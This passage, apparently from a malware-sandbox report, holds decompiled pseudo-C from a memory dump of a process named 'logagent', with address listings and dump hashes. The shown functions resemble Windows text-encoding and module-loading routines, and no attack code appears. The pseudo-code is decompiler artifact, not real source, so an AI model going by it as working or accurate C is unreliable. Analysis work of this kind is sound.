																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x51b1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M051B1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                              0x051b0d2b
                                              0x051b0d2e
                                              0x051b0d32
                                              0x051b0d39
                                              0x051b0d3b
                                              0x051b0d3d
                                              0x051b0d3f
                                              0x051b0d46
                                              0x051b0d4d
                                              0x051b0d54
                                              0x051b0d5b
                                              0x051b0d62
                                              0x051b0d69
                                              0x051b0d70
                                              0x051b0d77
                                              0x051b0d7e
                                              0x051b0d85
                                              0x051b0d88
                                              0x051b0d8b
                                              0x051b0d8e
                                              0x051b0d91
                                              0x051b0d94
                                              0x051b0d97
                                              0x051b0d9a
                                              0x051b0d9d
                                              0x051b0da6
                                              0x051b10e9
                                              0x051b10ee
                                              0x051b0db9
                                              0x051b0db9
                                              0x051b0dbc
                                              0x0520e9c7
                                              0x0520e9ca
                                              0x0520e9cd
                                              0x0520e9d0
                                              0x0520e9dd
                                              0x0520e9dd
                                              0x051b0dec
                                              0x051b0dec
                                              0x051b0dee
                                              0x051b0df3
                                              0x051b0ebf
                                              0x051b0ec0
                                              0x00000000
                                              0x051b0df9
                                              0x051b0df9
                                              0x051b0e1e
                                              0x051b0e21
                                              0x051b0e24
                                              0x051b0e27
                                              0x051b0e2a
                                              0x051b0e2d
                                              0x051b0e30
                                              0x051b0e36
                                              0x051b1040
                                              0x051b1043
                                              0x051b1049
                                              0x051b1049
                                              0x051b0e3c
                                              0x051b0e3f
                                              0x051b1007
                                              0x051b100a
                                              0x051b1010
                                              0x051b1010
                                              0x051b100a
                                              0x051b0e3f
                                              0x051b0e58
                                              0x051b0e5d
                                              0x051b1000
                                              0x051b0e63
                                              0x051b0e63
                                              0x051b0e63
                                              0x051b0e67
                                              0x051b0e69
                                              0x051b0e69
                                              0x051b0e6d
                                              0x051b0e70
                                              0x051b0e74
                                              0x051b0e76
                                              0x051b0e76
                                              0x051b0e7a
                                              0x051b0e7c
                                              0x051b0e7c
                                              0x051b0e83
                                              0x051b0e86
                                              0x051b0e87
                                              0x051b0e89
                                              0x051b0e8b
                                              0x051b0e91
                                              0x051b0e00
                                              0x051b0e03
                                              0x051b0e03
                                              0x051b0e07
                                              0x051b0e0f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0e0f
                                              0x051b0e97
                                              0x051b0e9c
                                              0x051b113e
                                              0x051b1141
                                              0x051b1143
                                              0x051b0eb1
                                              0x051b0eb1
                                              0x051b0eb4
                                              0x051b0eb6
                                              0x051b1110
                                              0x051b1112
                                              0x0520ea25
                                              0x0520ea25
                                              0x051b0ec3
                                              0x051b0ec3
                                              0x051b0ecb
                                              0x051b10fe
                                              0x051b0ed1
                                              0x051b0ed1
                                              0x051b0ed1
                                              0x051b0ed3
                                              0x051b0edb
                                              0x0520ea2d
                                              0x0520ea2f
                                              0x0520ea31
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0520ea37
                                              0x0520ea37
                                              0x0520ea3a
                                              0x0520ea3e
                                              0x0520ea47
                                              0x0520ea4a
                                              0x0520ea4c
                                              0x0520ea4d
                                              0x0520ea4d
                                              0x0520ea4e
                                              0x0520ea4e
                                              0x0520ea51
                                              0x0520ea52
                                              0x0520ea52
                                              0x00000000
                                              0x051b0ee1
                                              0x051b0ee1
                                              0x051b0ee1
                                              0x051b0ee3
                                              0x051b0ee3
                                              0x051b0ee6
                                              0x051b0eec
                                              0x0520ea5b
                                              0x0520ea5d
                                              0x051b0ef6
                                              0x051b0ef8
                                              0x0520ea6f
                                              0x0520ea6f
                                              0x051b0efe
                                              0x051b0efe
                                              0x051b0f03
                                              0x0520ea7b
                                              0x0520ea7d
                                              0x00000000
                                              0x00000000
                                              0x0520ea83
                                              0x0520ea85
                                              0x00000000
                                              0x00000000
                                              0x0520ea8b
                                              0x0520ea91
                                              0x00000000
                                              0x00000000
                                              0x0520ea97
                                              0x0520ea9a
                                              0x0520eaa0
                                              0x0520eaa2
                                              0x0520eaa2
                                              0x0520eaae
                                              0x0520eab3
                                              0x0520eab6
                                              0x0520eabf
                                              0x0520eaca
                                              0x0520eacd
                                              0x0520ead1
                                              0x0520ead1
                                              0x0520eab8
                                              0x0520eab8
                                              0x0520eab8
                                              0x0520ead2
                                              0x0520ead9
                                              0x051b0f0e
                                              0x051b0f15
                                              0x051b0f17
                                              0x051b0f17
                                              0x051b0f1e
                                              0x051b0f23
                                              0x0520eae1
                                              0x0520eae1
                                              0x051b0f38
                                              0x051b0f3a
                                              0x051b0f3a
                                              0x051b0f49
                                              0x051b1108
                                              0x051b1108
                                              0x051b0f5b
                                              0x051b10c7
                                              0x051b10ca
                                              0x051b10cc
                                              0x00000000
                                              0x00000000
                                              0x051b10dc
                                              0x051b10de
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0f61
                                              0x051b0f61
                                              0x051b0f61
                                              0x051b0f67
                                              0x051b0f6b
                                              0x051b111d
                                              0x051b111d
                                              0x051b0f75
                                              0x051b0f77
                                              0x051b0f77
                                              0x051b0f85
                                              0x051b0f8b
                                              0x051b10b9
                                              0x051b10bc
                                              0x0520eae9
                                              0x0520eae9
                                              0x051b0f91
                                              0x051b0f91
                                              0x051b0f91
                                              0x051b0f96
                                              0x051b0f98
                                              0x051b0f9a
                                              0x051b0f9a
                                              0x051b0fa6
                                              0x051b107c
                                              0x051b107f
                                              0x051b108d
                                              0x00000000
                                              0x051b108d
                                              0x051b1081
                                              0x051b1087
                                              0x0520eaf4
                                              0x0520eafa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0520eb00
                                              0x00000000
                                              0x051b0fac
                                              0x051b0fac
                                              0x00000000
                                              0x051b0fac
                                              0x051b0fa6
                                              0x051b0f5b
                                              0x051b0f09
                                              0x051b0f09
                                              0x00000000
                                              0x051b0f09
                                              0x0520ea63
                                              0x00000000
                                              0x0520ea63
                                              0x051b0ef4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0ef4
                                              0x051b0ebc
                                              0x051b0ebc
                                              0x00000000
                                              0x051b0ebc
                                              0x051b0eb6
                                              0x051b1149
                                              0x051b114c
                                              0x051b114d
                                              0x00000000
                                              0x051b114d
                                              0x051b0ea4
                                              0x051b0ea7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0fb7
                                              0x051b0fb7
                                              0x051b0fbc
                                              0x051b0fc9
                                              0x051b0fc9
                                              0x051b0fce
                                              0x051b1020
                                              0x051b1025
                                              0x051b1094
                                              0x051b1094
                                              0x051b1099
                                              0x0520ea04
                                              0x0520ea04
                                              0x0520ea09
                                              0x0520ea1c
                                              0x0520ea0b
                                              0x0520ea0b
                                              0x0520ea0e
                                              0x0520ea14
                                              0x0520ea14
                                              0x0520ea0e
                                              0x0520ea09
                                              0x051b1027
                                              0x051b1027
                                              0x051b1155
                                              0x051b102d
                                              0x051b102d
                                              0x051b102d
                                              0x051b1032
                                              0x0520e9fc
                                              0x0520e9fc
                                              0x051b1032
                                              0x051b1027
                                              0x00000000
                                              0x051b1025
                                              0x051b0fd0
                                              0x0520e9f4
                                              0x00000000
                                              0x0520e9f4
                                              0x051b0fd6
                                              0x051b0fd9
                                              0x051b1059
                                              0x051b1059
                                              0x051b105e
                                              0x0520e9ec
                                              0x051b1064
                                              0x051b1064
                                              0x051b1064
                                              0x051b1069
                                              0x051b10ac
                                              0x051b106b
                                              0x051b106b
                                              0x051b106e
                                              0x051b1074
                                              0x051b1074
                                              0x051b106e
                                              0x051b1069
                                              0x00000000
                                              0x051b105e
                                              0x051b0fdb
                                              0x051b10a4
                                              0x00000000
                                              0x051b10a4
                                              0x051b0fe1
                                              0x051b0fe4
                                              0x00000000
                                              0x00000000
                                              0x051b0fea
                                              0x051b0ff1
                                              0x00000000
                                              0x051b0ff8
                                              0x00000000
                                              0x00000000
                                              0x0520e9e4
                                              0x00000000
                                              0x00000000
                                              0x051b1018
                                              0x00000000
                                              0x00000000
                                              0x051b1051
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0ff1
                                              0x051b0fbe
                                              0x051b0fc3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b0fc3
                                              0x051b0df3
                                              0x0520e9d5
                                              0x0520e9d7
                                              0x051b1128
                                              0x051b1128
                                              0x051b112b
                                              0x051b112d
                                              0x051b1133
                                              0x051b1133
                                              0x00000000
                                              0x051b112d
                                              0x00000000
                                              0x0520e9d7
                                              0x051b0dc2
                                              0x051b10f6
                                              0x051b0dd4
                                              0x051b0dd7
                                              0x051b0dda
                                              0x051b0de8
                                              0x051b0de9
                                              0x051b0de9
                                              0x051b0dda
                                              0x00000000
                                              0x051b0dc2
                                              0x051b0dac
                                              0x051b0dae
                                              0x051b0db3
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ff07dac5274e4f54026f6705a3169637a7b943098c644cde43818e2bf840bef
                                              • Instruction ID: a9fe5579b458a68bf74516cc5c712581bae18c5c81894372f4a82590da6b555d
                                              • Opcode Fuzzy Hash: 6ff07dac5274e4f54026f6705a3169637a7b943098c644cde43818e2bf840bef
                                              • Instruction Fuzzy Hash: C1D1B331E082599BFF28CE99C5987FEB7B6FF48300F164029D446A7295D7B989C1CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E051CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x52ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E051C6600(0x52a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x52a7b9c; // 0x0
							_t281 = L051D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E051FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x52a7b90; // 0x77cf0000
								if(_t384 == 0) {
									_t353 =  *0x52a7b8c; // 0x3452b98
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x3452c48
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E051D2280(_t200, 0x52a84d8);
									_t277 =  *0x52a85f4; // 0x3453460
									_t351 =  *0x52a85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74a20000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x34534a8
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x34533f8
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x34534a8
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x3454158
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E051CFFB0(_t287, _t353, 0x52a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0520CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E051C6600(0x52a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E051C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x52ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0523E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x52a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x52ab218; // 0x0
														asm("ror edi, cl");
														 *0x52ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E051D2280(_t250, 0x52a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L051F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E051CFFB0(_t293, _t353, 0x52a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E051F37F5(_t353, 0);
																}
																E051F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E051E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E051E02D6(_t174);
																}
																L051D77F0( *0x52a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E051EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L051CEC7F(_t353);
										L051E19B8(_t287, 0, _t353, 0);
										_t200 = E051BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E051FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x52ab2f8; // 0xe00000
									if((_t206 |  *0x52ab2fc) == 0 || ( *0x52ab2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x52ab2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05266B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05266AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E051CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L051CEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E051F9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E051CE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L051C8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E051F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
